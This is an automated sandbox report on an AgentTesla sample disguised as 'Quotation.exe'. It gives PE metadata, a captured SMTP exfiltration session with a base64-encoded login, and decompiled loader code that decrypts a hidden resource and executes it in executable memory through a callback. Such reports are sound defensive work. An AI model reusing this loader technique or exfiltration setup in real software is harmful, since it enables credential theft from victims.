                                                                    Entrypoint:0x4088a7
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x5FFEC843 [Wed Jan 13 10:15:31 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:e7da020c2fad0c59a3d5e97971484548

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007FA96CC53A71h
                                                                    jmp 00007FA96CC4C6D5h
                                                                    push 00000014h
                                                                    push 0041D838h
                                                                    call 00007FA96CC4CF78h
                                                                    call 00007FA96CC4FE26h
                                                                    movzx esi, ax
                                                                    push 00000002h
                                                                    call 00007FA96CC53A04h
                                                                    pop ecx
                                                                    mov eax, 00005A4Dh
                                                                    cmp word ptr [00400000h], ax
                                                                    je 00007FA96CC4C6D6h
                                                                    xor ebx, ebx
                                                                    jmp 00007FA96CC4C705h
                                                                    mov eax, dword ptr [0040003Ch]
                                                                    cmp dword ptr [eax+00400000h], 00004550h
                                                                    jne 00007FA96CC4C6BDh
                                                                    mov ecx, 0000010Bh
                                                                    cmp word ptr [eax+00400018h], cx
                                                                    jne 00007FA96CC4C6AFh
                                                                    xor ebx, ebx
                                                                    cmp dword ptr [eax+00400074h], 0Eh
                                                                    jbe 00007FA96CC4C6DBh
                                                                    cmp dword ptr [eax+004000E8h], ebx
                                                                    setne bl
                                                                    mov dword ptr [ebp-1Ch], ebx
                                                                    call 00007FA96CC50E13h
                                                                    test eax, eax
                                                                    jne 00007FA96CC4C6DAh
                                                                    push 0000001Ch
                                                                    call 00007FA96CC4C7A5h
                                                                    pop ecx
                                                                    call 00007FA96CC5147Ch
                                                                    test eax, eax
                                                                    jne 00007FA96CC4C6DAh
                                                                    push 00000010h
                                                                    call 00007FA96CC4C794h
                                                                    pop ecx
                                                                    call 00007FA96CC4FBB8h
                                                                    and dword ptr [ebp-04h], 00000000h
                                                                    call 00007FA96CC4E353h
                                                                    call dword ptr [004180C8h]
                                                                    mov dword ptr [00424080h], eax
                                                                    call 00007FA96CC53A62h
                                                                    mov dword ptr [00422284h], eax
                                                                    call 00007FA96CC53663h
                                                                    test eax, eax
                                                                    jns 00007FA96CC4C6DAh
                                                                    push 00000008h
                                                                    call 00007FA96CC4B28Ah
                                                                    pop ecx
                                                                    call 00007FA96CC5387Fh

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [LNK] VS2012 build 50727
                                                                    • [RES] VS2012 build 50727
                                                                    • [ C ] VS2012 build 50727

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1db940xdc.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x1a78.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x270000x1150.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1d6e00x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x180000x1c8.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x16d9a0x16e00False0.571209016393data6.67400094026IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x180000x64f80x6600False0.572227328431data6.01779519415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x1f0000x50980x3400False0.285531850962data4.70097691284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x250000x1a780x1c00False0.937918526786data7.70017907043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x270000x17980x1800False0.606770833333data5.55502371105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_RCDATA0x250700x1a05dataEnglishUnited States

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllRaiseException, ReadConsoleW, ReadFile, CreateFileW, WriteConsoleW, GetStringTypeW, LCMapStringEx, SetConsoleCursorPosition, LoadLibraryW, GetModuleHandleW, HeapReAlloc, HeapSize, OutputDebugStringW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, GetStdHandle, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetCurrentThreadId, SetLastError, GetCPInfo, GetOEMCP, GetACP, EncodePointer, DecodePointer, GetLastError, InterlockedDecrement, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, GetLocalTime, GetCommandLineA, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, HeapFree, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetFileType, DeleteCriticalSection, InitOnceExecuteOnce, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetCurrentProcess, TerminateProcess, WriteFile, GetModuleFileNameW, Sleep, LoadLibraryExW, InterlockedIncrement, IsValidCodePage, SetEndOfFile
                                                                    msi.dll
                                                                    loadperf.dllLoadPerfCounterTextStringsA, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA
                                                                    MSVFW32.dllStretchDIB
                                                                    AVIFIL32.dllAVIFileExit, AVIStreamReadData
                                                                    pdh.dllPdhEnumObjectsW, PdhSetQueryTimeRange, PdhGetDllVersion
                                                                    WSOCK32.dllWSASetBlockingHook, WSACancelAsyncRequest, bind, ord1104, ord1108, ord1130
                                                                    GDI32.dllStartDocW, GdiGetSpoolFileHandle, PolyBezier
                                                                    MAPI32.dll
                                                                    MSACM32.dllacmDriverPriority, acmFilterTagDetailsA

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    01/13/21-15:15:38.966414TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49745587192.168.2.3208.91.199.223

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 13, 2021 15:15:35.314064026 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:35.478625059 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:35.478744030 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:36.806340933 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:36.807004929 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:36.971457958 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:36.971508026 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:36.975511074 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:37.140980005 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:37.142096996 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:37.308986902 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:37.310220003 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:37.475601912 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:37.475989103 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:37.681689978 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:38.796554089 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:38.797127008 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:38.961848021 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:38.961930037 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:38.966413975 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:38.966749907 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:38.967384100 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:38.967585087 CET49745587192.168.2.3208.91.199.223
                                                                    Jan 13, 2021 15:15:39.131251097 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:39.131844997 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:39.325953007 CET58749745208.91.199.223192.168.2.3
                                                                    Jan 13, 2021 15:15:39.380476952 CET49745587192.168.2.3208.91.199.223

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 13, 2021 15:13:44.280971050 CET6349253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:13:44.331659079 CET53634928.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:13:45.198905945 CET6083153192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:13:45.249743938 CET53608318.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:13:46.452153921 CET6010053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:13:46.502955914 CET53601008.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:13:47.585551977 CET5319553192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:13:47.633511066 CET53531958.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:13:48.733051062 CET5014153192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:13:48.784104109 CET53501418.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:13:54.219192982 CET5302353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:13:54.275454044 CET53530238.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:13:55.554056883 CET4956353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:13:55.601938009 CET53495638.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:13:58.296257973 CET5135253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:13:58.344077110 CET53513528.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:09.493856907 CET5934953192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:09.560898066 CET53593498.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:12.784993887 CET5708453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:12.832830906 CET53570848.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:16.910830975 CET5882353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:16.970999002 CET53588238.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:23.222948074 CET5756853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:23.271013975 CET53575688.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:24.626652002 CET5054053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:24.677258968 CET53505408.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:25.915412903 CET5436653192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:25.963491917 CET53543668.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:27.501863003 CET5303453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:27.549911022 CET53530348.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:31.362889051 CET5776253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:31.427084923 CET53577628.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:32.727749109 CET5543553192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:32.785964012 CET53554358.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:34.281919956 CET5071353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:34.332604885 CET53507138.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:37.505099058 CET5613253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:37.565355062 CET53561328.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:14:48.855766058 CET5898753192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:14:48.903816938 CET53589878.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:15:09.973148108 CET5657953192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:15:10.021362066 CET53565798.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:15:10.423557043 CET6063353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:15:10.494976044 CET53606338.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:15:34.927287102 CET6129253192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:15:35.148483992 CET53612928.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:15:35.165376902 CET6361953192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:15:35.221530914 CET53636198.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:15:35.288636923 CET6493853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:15:35.336599112 CET53649388.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:25.954849005 CET6194653192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:26.005656958 CET53619468.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:26.678599119 CET6491053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:26.735167027 CET53649108.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:27.529829979 CET5212353192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:27.589039087 CET53521238.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:28.172056913 CET5613053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:28.239115000 CET53561308.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:28.869467020 CET5633853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:28.917346001 CET53563388.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:29.790409088 CET5942053192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:29.846630096 CET53594208.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:30.543559074 CET5878453192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:30.591561079 CET53587848.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:31.605684996 CET6397853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:31.653654099 CET53639788.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:35.180238962 CET6293853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:35.239662886 CET53629388.8.8.8192.168.2.3
                                                                    Jan 13, 2021 15:16:35.681768894 CET5570853192.168.2.38.8.8.8
                                                                    Jan 13, 2021 15:16:35.740520954 CET53557088.8.8.8192.168.2.3

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Jan 13, 2021 15:15:34.927287102 CET192.168.2.38.8.8.80xf95eStandard query (0)smtp.tthyssenkrupp.comA (IP address)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.165376902 CET192.168.2.38.8.8.80x3e31Standard query (0)smtp.tthyssenkrupp.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Jan 13, 2021 15:15:35.148483992 CET8.8.8.8192.168.2.30xf95eNo error (0)smtp.tthyssenkrupp.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.148483992 CET8.8.8.8192.168.2.30xf95eNo error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.148483992 CET8.8.8.8192.168.2.30xf95eNo error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.148483992 CET8.8.8.8192.168.2.30xf95eNo error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.148483992 CET8.8.8.8192.168.2.30xf95eNo error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.221530914 CET8.8.8.8192.168.2.30x3e31No error (0)smtp.tthyssenkrupp.comus2.smtp.mailhostbox.comCNAME (Canonical name)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.221530914 CET8.8.8.8192.168.2.30x3e31No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.221530914 CET8.8.8.8192.168.2.30x3e31No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.221530914 CET8.8.8.8192.168.2.30x3e31No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)
                                                                    Jan 13, 2021 15:15:35.221530914 CET8.8.8.8192.168.2.30x3e31No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)

                                                                    SMTP Packets

                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    Jan 13, 2021 15:15:36.806340933 CET58749745208.91.199.223192.168.2.3220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                    Jan 13, 2021 15:15:36.807004929 CET49745587192.168.2.3208.91.199.223EHLO 287400
                                                                    Jan 13, 2021 15:15:36.971508026 CET58749745208.91.199.223192.168.2.3250-us2.outbound.mailhostbox.com
                                                                    250-PIPELINING
                                                                    250-SIZE 41648128
                                                                    250-VRFY
                                                                    250-ETRN
                                                                    250-STARTTLS
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-AUTH=PLAIN LOGIN
                                                                    250-ENHANCEDSTATUSCODES
                                                                    250-8BITMIME
                                                                    250 DSN
                                                                    Jan 13, 2021 15:15:36.975511074 CET49745587192.168.2.3208.91.199.223AUTH login bWF1cm8uYWd1aWFyaUB0dGh5c3NlbmtydXBwLmNvbQ==
                                                                    Jan 13, 2021 15:15:37.140980005 CET58749745208.91.199.223192.168.2.3334 UGFzc3dvcmQ6
                                                                    Jan 13, 2021 15:15:37.308986902 CET58749745208.91.199.223192.168.2.3235 2.7.0 Authentication successful
                                                                    Jan 13, 2021 15:15:37.310220003 CET49745587192.168.2.3208.91.199.223MAIL FROM:<mauro.aguiari@tthyssenkrupp.com>
                                                                    Jan 13, 2021 15:15:37.475601912 CET58749745208.91.199.223192.168.2.3250 2.1.0 Ok
                                                                    Jan 13, 2021 15:15:37.475989103 CET49745587192.168.2.3208.91.199.223RCPT TO:<mauro.aguiari@tthyssenkrupp.com>
                                                                    Jan 13, 2021 15:15:38.796554089 CET58749745208.91.199.223192.168.2.3250 2.1.5 Ok
                                                                    Jan 13, 2021 15:15:38.797127008 CET49745587192.168.2.3208.91.199.223DATA
                                                                    Jan 13, 2021 15:15:38.961930037 CET58749745208.91.199.223192.168.2.3354 End data with <CR><LF>.<CR><LF>
                                                                    Jan 13, 2021 15:15:38.967585087 CET49745587192.168.2.3208.91.199.223.
                                                                    Jan 13, 2021 15:15:39.325953007 CET58749745208.91.199.223192.168.2.3250 2.0.0 Ok: queued as B25781828A9

                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Start time:15:13:47
                                                                    Start date:13/01/2021
                                                                    Path:C:\Users\user\Desktop\Quotation.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\Quotation.exe'
                                                                    Imagebase:0xbe0000
                                                                    File size:440320 bytes
                                                                    MD5 hash:C478A9DD6E72AC0E96AA0BD90D7B9EC2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.226102208.0000000002D90000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:15:13:49
                                                                    Start date:13/01/2021
                                                                    Path:C:\Users\user\Desktop\Quotation.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Users\user\Desktop\Quotation.exe'
                                                                    Imagebase:0xbe0000
                                                                    File size:440320 bytes
                                                                    MD5 hash:C478A9DD6E72AC0E96AA0BD90D7B9EC2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low

                                                                    General

                                                                    Start time:15:13:50
                                                                    Start date:13/01/2021
                                                                    Path:C:\Users\user\Desktop\Quotation.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\Quotation.exe
                                                                    Imagebase:0xbe0000
                                                                    File size:440320 bytes
                                                                    MD5 hash:C478A9DD6E72AC0E96AA0BD90D7B9EC2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.233917057.0000000000B80000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:15:13:51
                                                                    Start date:13/01/2021
                                                                    Path:C:\Users\user\Desktop\Quotation.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\Quotation.exe
                                                                    Imagebase:0xbe0000
                                                                    File size:440320 bytes
                                                                    MD5 hash:C478A9DD6E72AC0E96AA0BD90D7B9EC2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.588164369.0000000000F39000.00000004.00000020.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.589076176.0000000002AE2000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.592948035.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.588949913.0000000002970000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Executed Functions

                                                                      C-Code - Quality: 66%
                                                                      			E00BE1040(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				signed int _v5;
                                                                      				signed int _v12;
                                                                      				struct HINSTANCE__* _v16;
                                                                      				intOrPtr _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				intOrPtr _v44;
                                                                      				long _v48;
                                                                      				void* _v1048;
                                                                      				void* _v7712;
                                                                      				void* __ebp;
                                                                      				void* _t130;
                                                                      				void* _t131;
                                                                      				void* _t174;
                                                                      				void* _t175;
                                                                      				void* _t176;
                                                                      				void* _t177;
                                                                      				void* _t178;
                                                                      				void* _t182;
                                                                      
                                                                      				_t182 = __fp0;
                                                                      				_t175 = __esi;
                                                                      				_t174 = __edi;
                                                                      				_t131 = __ecx;
                                                                      				E00BE8770(0x1e1c);
                                                                      				_v16 = GetModuleHandleW(L"Kernel32.dll");
                                                                      				E00BE6B80(_t131); // executed
                                                                      				_v44 = E00BE6A70(_v16, 0xb616c5d9);
                                                                      				_v40 = E00BE6A70(_v16, 0xe0baa99);
                                                                      				_v32 = E00BE6A70(LoadLibraryW(L"User32.dll"), 0x23fdef72);
                                                                      				_v24 = E00BE6A70(LoadLibraryW(L"User32.dll"), 0x695c9378);
                                                                      				_v36 = E00BE6A70(_v16, 0x9347c911);
                                                                      				_v28 = _v36(0, L"IEUCIZEO", 0xa);
                                                                      				_v20 = _v40(0, _v28);
                                                                      				E00BE7AE0( &_v7712, _v20, 0x1a05);
                                                                      				_t178 = _t177 + 0xc;
                                                                      				_v12 = 0;
                                                                      				while(_v12 < 0x1a05) {
                                                                      					_v5 =  *((intOrPtr*)(_t176 + _v12 - 0x1e1c));
                                                                      					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                                      					_v5 = (_v5 & 0x000000ff) - _v12;
                                                                      					_v5 = _v5 & 0x000000ff ^ 0x00000032;
                                                                      					_v5 = (_v5 & 0x000000ff) - _v12;
                                                                      					_v5 = _v5 & 0x000000ff ^ 0x00000020;
                                                                      					_v5 =  !(_v5 & 0x000000ff);
                                                                      					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
                                                                      					_v5 = _v5 & 0x000000ff ^ 0x00000080;
                                                                      					_v5 =  ~(_v5 & 0x000000ff);
                                                                      					_v5 = (_v5 & 0x000000ff) - _v12;
                                                                      					_v5 =  ~(_v5 & 0x000000ff);
                                                                      					_v5 =  !(_v5 & 0x000000ff);
                                                                      					_v5 = _v5 & 0x000000ff ^ _v12;
                                                                      					_v5 =  ~(_v5 & 0x000000ff);
                                                                      					_v5 = (_v5 & 0x000000ff) + 0xb;
                                                                      					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
                                                                      					_v5 =  !(_v5 & 0x000000ff);
                                                                      					 *((char*)(_t176 + _v12 - 0x1e1c)) = _v5;
                                                                      					_v12 = _v12 + 1;
                                                                      				}
                                                                      				VirtualProtect( &_v7712, 0x1a05, 0x40,  &_v48);
                                                                      				GrayStringW(_v24(0), 0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0);
                                                                      				E00BE21E0( &_v7712, _t174, _t175, __eflags);
                                                                      				while(1) {
                                                                      					E00BE1380(_t174, _t175, __eflags, 8, 9, 0x46, 0xd);
                                                                      					E00BE12B0(0xa, 0xb);
                                                                      					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
                                                                      					E00BE715C(_t130, _t174, _t175, __eflags);
                                                                      					_t178 = _t178 + 4;
                                                                      					__eflags = (_v5 & 0x000000ff) - 0x41;
                                                                      					if((_v5 & 0x000000ff) == 0x41) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags = (_v5 & 0x000000ff) - 0x61;
                                                                      					if((_v5 & 0x000000ff) != 0x61) {
                                                                      						__eflags = (_v5 & 0x000000ff) - 0x53;
                                                                      						if((_v5 & 0x000000ff) == 0x53) {
                                                                      							L10:
                                                                      							E00BE3610(_t130, _t174, _t175, _t182);
                                                                      						} else {
                                                                      							__eflags = (_v5 & 0x000000ff) - 0x73;
                                                                      							if((_v5 & 0x000000ff) != 0x73) {
                                                                      								__eflags = (_v5 & 0x000000ff) - 0x1b;
                                                                      								if((_v5 & 0x000000ff) == 0x1b) {
                                                                      									E00BE77B1(0);
                                                                      								}
                                                                      								__eflags = 1;
                                                                      								if(1 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      							} else {
                                                                      								goto L10;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						break;
                                                                      					}
